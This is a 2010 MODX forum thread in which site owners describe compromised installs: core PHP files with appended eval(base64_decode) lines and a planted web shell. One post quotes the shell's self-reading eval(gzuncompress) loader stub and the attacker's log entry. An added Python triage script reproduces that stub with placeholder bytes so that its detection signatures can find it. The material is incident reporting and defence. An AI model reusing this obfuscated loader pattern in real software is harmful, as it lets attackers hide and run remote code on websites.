    I wonder if this contributed to the problem
    http://bugs.modx.com/browse/MODX-2281
    with more detail here
    http://packetstormsecurity.org/1008-exploits/modx-xssxsrf.txt
    Hopefully that will get taken care of in the next release???
    Matt
      I discovered the same for one of my sites too:
      - manager/includes/document.parser.class.inc.php had an eval(base64(...)) code at the end
      - there was a probably randomly named php file at assets/docs that contained binary data ready to be served (from the header it seemed to be zip file data)

      modx version 1.0.2
      ajaxsearch 1.8.4
      hosted at hostgator servers

      So is it ajax search for sure? Any Updates on this?

      Thank you in advance!
      • If you have a file called /snippets/ajaxsearch/ajax.php on your file system, it could be the cause. That was removed in the 1.0.3 update which was essentially labeled as a "if you don’t upgrade you’ll likely get hacked" must upgrade release, as was 1.0.4. 1.0.3 and later included several security updates ... see the security thread in the Important announcements (also fed directly to your manager every time you login) for more information.

          Ryan Thrash, MODX Co-Founder
          Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
          I do indeed have an outdated version of modx (I have upgraded the site to 1.0.4), but there was not a /snippets/ajaxsearch/ajax.php file at my file system. Maybe the security hole is somewhere else?
          • Please see the security threads under important announcements. You need to upgrade.
              Ryan Thrash, MODX Co-Founder
              I too just discovered that I had two infected "eval(base64_decode" files (manager/includes/document.parser.class.inc.php & manager/includes/protect.inc.php) that were injecting an iframe at random intervals into pages.

              This was not an upgrade and I am using v1.0.4 at Hostgator.
              Oddly enough, I am using a DynamicDrive script on the site, which someone mentioned in an earlier thread.
              I am not using any ajax search on the site.
              • Quote from: islander at Oct 29, 2010, 08:29 PM

                I too just discovered that I had two infected "eval(base64_decode" files (manager/includes/document.parser.class.inc.php & manager/includes/protect.inc.php) that were injecting an iframe at random intervals into pages.

                This was not an upgrade and I am using v1.0.4 at Hostgator.
                Oddly enough, I am using a DynamicDrive script on the site, which someone mentioned in an earlier thread.
                I am not using any ajax search on the site.
                Are you referring to this extra?
                  Quote from: OpenGeek at Oct 29, 2010, 10:02 PM

                  Are you referring to this extra?
                  Ah, no. Not this time. On a previous site I think I had something similar to that for MM for MaxiGallery. But not on this site.
                    I just received this back from Hostgator:

                    PHP shell placed into the account via exploiting ModX. Please check for updates.

                    How the second site was altered:
                    80.190.200.157 - - [29/Oct/2010:03:27:46 -0500] "POST /assets/files/xmlrpck.php?pird HTTP/1.1" 200 31464 "-" "-"

                    The file "xmlrpck.php" had its permissions set via shell, therefor I could not delete it from ftp. It was also encrypted or compressed.
                    First line was:
                    <?php list(,$zip) = explode("ZIP"."_BEGIN",file_get_contents(__FILE__));eval(gzuncompress($zip));die;?>ZIP_BEGINxÚì½isI’ ú￾füYÙœPA\<@Š,ñ&("ž’–  
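The posts above describe two traces of the compromise: PHP files with an eval() over a base64 or gzip-compressed payload appended to them (document.parser.class.inc.php, protect.inc.php), and a loader that reads itself, splits on a marker hidden as "ZIP"."_BEGIN", and carries a binary blob after it, plus the host's log line showing a POST to a .php file under /assets/. The following is an added triage script, not code from the thread or from MODX, that scans a site tree for those signatures and flags successful POSTs to PHP files in directories that should only hold static content. The sample tree and the benign log lines are constructed; the host's quoted request is used as the one suspicious entry. The binary blob in the sample loader is a stand-in byte sequence, not the real payload.

```python
import re
import tempfile
from pathlib import Path

# Heuristic signatures for the infection pattern described in the thread:
# eval() over a base64 or gzip payload, a file that reads itself to pull a
# payload from after a marker, and a literal split with "." to hide such a
# marker from a naive grep (e.g. "ZIP"."_BEGIN"). Treat hits as leads, not proof.
SUSPICIOUS_PATTERNS = (
    ("eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(")),
    ("eval_gzuncompress", re.compile(r"eval\s*\(\s*gzuncompress\s*\(")),
    ("reads_own_file", re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)")),
    ("split_string_literal", re.compile(r'"[A-Za-z_]+"\s*\.\s*"[A-Za-z_]+"')),
)


def scan_php_text(text):
    """Return the names of every suspicious pattern present in PHP source text."""
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(text)]


def scan_php_file(path):
    """Scan one file. Decoding as latin-1 never fails, so a binary blob appended
    after the PHP stub does not stop the stub itself from being examined."""
    text = Path(path).read_bytes().decode("latin-1")
    hits = scan_php_text(text)
    # A PHP source file should not end in a block of non-printable bytes.
    tail = text[-256:]
    nonprint = sum(1 for ch in tail if ch not in "\t\n\r" and not 32 <= ord(ch) <= 126)
    if tail and nonprint / len(tail) > 0.2:
        hits.append("binary_tail")
    return hits


def scan_tree(root):
    """Map each .php file under root (path relative to root) to its hits; clean files are omitted."""
    root = Path(root)
    results = {}
    for p in sorted(root.rglob("*.php")):
        hits = scan_php_file(p)
        if hits:
            results[p.relative_to(root).as_posix()] = hits
    return results


# Common Log Format with the request line split into method and target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def flag_access_log(lines, static_dirs=("/assets/",)):
    """Return (ip, timestamp, path) for successful POSTs to .php files under
    directories that are meant to serve uploads and other static content."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        if (m.group("method") == "POST" and m.group("status") == "200"
                and path.endswith(".php") and path.startswith(static_dirs)):
            flagged.append((m.group("ip"), m.group("ts"), path))
    return flagged


SAMPLE_LOG = [
    # The request quoted by the host in the thread.
    '80.190.200.157 - - [29/Oct/2010:03:27:46 -0500] "POST /assets/files/xmlrpck.php?pird HTTP/1.1" 200 31464 "-" "-"',
    # Constructed benign traffic: a page view, a manager login, a static asset.
    '192.0.2.10 - - [29/Oct/2010:03:30:01 -0500] "GET /index.php?id=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [29/Oct/2010:03:31:12 -0500] "POST /manager/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [29/Oct/2010:03:32:40 -0500] "GET /assets/files/logo.png HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
]


def build_demo_tree(root):
    """Write a constructed sample tree: a clean file, a core file with an appended
    eval(base64_decode()) line, and a self-reading loader like the one quoted above."""
    root = Path(root)
    (root / "manager" / "includes").mkdir(parents=True)
    (root / "assets" / "files").mkdir(parents=True)
    (root / "index.php").write_text("<?php\nrequire 'manager/includes/config.inc.php';\n")
    (root / "manager" / "includes" / "document.parser.class.inc.php").write_text(
        "<?php\nclass DocumentParser {}\n"
        "eval(base64_decode('Li4u'));\n"  # constructed placeholder payload ("...")
    )
    loader = (
        '<?php list(,$zip) = explode("ZIP"."_BEGIN",file_get_contents(__FILE__));'
        'eval(gzuncompress($zip));die;?>ZIP_BEGIN'
    ).encode() + bytes(range(256))  # constructed stand-in for the compressed blob
    (root / "assets" / "files" / "xmlrpck.php").write_bytes(loader)


def run_demo():
    """Build the sample tree in a temp dir; return (file hits, flagged requests)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        file_hits = scan_tree(tmp)
    return file_hits, flag_access_log(SAMPLE_LOG)


if __name__ == "__main__":
    hits, reqs = run_demo()
    for path, names in hits.items():
        print(f"{path}: {', '.join(names)}")
    for ip, ts, path in reqs:
        print(f"review: POST {path} from {ip} at {ts}")
```

Run it against a real install with scan_tree("/path/to/site") and flag_access_log(open("access_log")). A hit on the core files means comparing them against a clean copy of the same MODX release rather than editing the infected line out, since the payload that wrote them is usually elsewhere (as the xmlrpck.php loader above was). The binary-tail check is what catches a loader whose stub is rewritten to dodge the four regexes.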
                    • Not sure why you are posting this stuff here tbh. If Hostgator is blaming MODx for the exploit, they need to identify the vector; otherwise, they need to identify the vector before blaming MODx.